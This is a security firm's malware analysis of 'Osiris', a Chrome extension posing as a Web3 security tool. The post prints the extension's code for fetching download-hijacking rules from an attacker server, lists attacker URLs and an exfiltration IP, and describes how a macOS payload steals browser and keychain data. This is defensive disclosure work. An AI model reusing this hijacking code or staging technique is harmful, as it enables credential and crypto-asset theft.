A Wolf in Sheep’s Clothing: Analysis of the Osiris Malicious Browser Extension

6 min readMay 28, 2025

Author: Thinking
Editor: Liz

Background

Earlier today, a user on X, @0xmaoning, reached out to the SlowMist security team for assistance after discovering suspicious behavior in a browser extension called “Osiris.” The extension, posing as a Web3 security tool, appeared highly deceptive — so much so that the user nearly fell victim. He hoped we could help investigate the threat and prevent others from being affected.

Following an in-depth analysis by the SlowMist security team, we confirmed that the Osiris extension is indeed malicious. It silently replaces legitimate download links with malicious ones, tricking users into downloading and installing harmful software, which can ultimately lead to the theft of their crypto assets.

We would like to extend our sincere thanks to X users @0xmaoning and @Onefly_eth for their timely reports and valuable clues, which played a key role in uncovering this threat and preventing further victims.

Related Attack Information

Malicious browser extension on Chrome Web Store:
https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf

Malware download URL:
https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg

Malicious website:
https[:]//osiris.vip/

Malware data exfiltration endpoint:
http[:]//192.124.178.88

Phishing Technique Analysis

The attacker promotes the malicious “Osiris” extension on social media, targeting specific users. This extension disguises itself as a Web3 security tool that claims to help users identify Web3 scams, phishing attempts, and malware. In reality, it is designed for malicious purposes.

Malicious extension download address (Risk reminder: Do not interact with or analyze the following content outside of an isolated environment.):
https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf

Upon analyzing the extension’s code, we found it uses the chrome.declarativeNetRequest.updateDynamicRules API to dynamically configure network request rules.

Code Sample:

function fetchDynamicRules() {

  chrome.storage.local.get("uid", data => {

    const uid = data.uid ? data.uid : "";

    const uidParam = uid ? `?uid=${uid}` : "";

    fetch(`${BASE_URL}/security${uidParam}`)

      .then(response => response.json())

      .then(rules => {

        if (!rules || !Array.isArray(rules)) {

          console.warn("Rules incorrect.");

          return;

        }

        const ruleIds = rules.map(rule => rule.id);

        chrome.declarativeNetRequest.updateDynamicRules({

          removeRuleIds: ruleIds,

          addRules: rules

        }, () => {

          console.log("Rules updated", rules);

        });

      })

      .catch(err => console.error("Error fetching rules:", err));

  });

}

The network request rules are retrieved from a server controlled by the attacker.

Example request URL:
https[:]//osiris.vip/security?uid=aauyaxxsyd

Once these rules are fetched and applied via chrome.declarativeNetRequest.updateDynamicRules, any network request matching the pattern will be intercepted and replaced.

Rule Behavior:

Matches all URLs ending in .exe, .dmg, or .zip
Targets only main frame or iframe requests
Replaces with a link to the malware

More about the declarativeNetRequest API:
https[:]//developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest

After installation, the attacker lures users to visit legitimate websites (e.g., the official site of Notion) and download an application. Once the download is triggered, the extension silently replaces the download link. Even though the browser download record displays the original, legitimate source, the file is actually a malicious program downloaded from the attacker’s server. This takes advantage of a display flaw in Chrome to deceive users.

Malware Analysis

We analyzed the macOS version of the malware in this case.

Malware download address (handle only in isolated environments):
https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg

Once opened, the malware prompts users to launch the Terminal and drag the “Installer” into it.

In fact, this process executes Installer.kmo, which uses Base64 encoding to hide its malicious intentions. It also asks the user to input their computer’s password to gain elevated privileges and access sensitive data.

After decoding, we found that a bash command was used to run an AppleScript. This script was designed to execute the hidden file .Installer with the following logic:

Locate the target volume: The script lists all mounted volumes and searches for one whose name contains “Installer”.
Copy the hidden installer: It copies the hidden file .Installer from the volume to the /tmp directory and grants it execute permission.
Execute silently: The copied installer is executed directly. The process is wrapped in a try block to suppress any errors, with no validation or user interaction required.

After .Installer is executed, it collects and packages the user's Chrome browser data and keychain information, then uploads it to http://192.124.178.88. Once the attacker obtains this data, they may attempt to decode and extract private keys or mnemonic phrases associated with Web3 wallets, thereby stealing the user's crypto assets. Additionally, credentials saved in Chrome could be harvested, allowing the attacker to take over accounts on social platforms, crypto exchanges, and other services.

We have previously analyzed similar attack techniques. Interested readers may refer to our report Seeing Is Not Believing: Analysis of a Fake Zoom Meeting Phishing Attack.

Conclusion

In the Web3 world, opportunity and danger go hand in hand. Solutions or tools that claim to enhance “security” may actually exploit the user’s trust to launch attacks.

This so-called “security extension” hijacks download links and plants malicious code to steal users’ crypto assets and personal data. Some users have already suffered losses.

Therefore, the SlowMist Security Team issues the following recommendations:

Do not install unfamiliar programs or browser extensions
Be cautious about unsolicited tool or solution recommendations
Use trusted antivirus software to strengthen local device protection

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.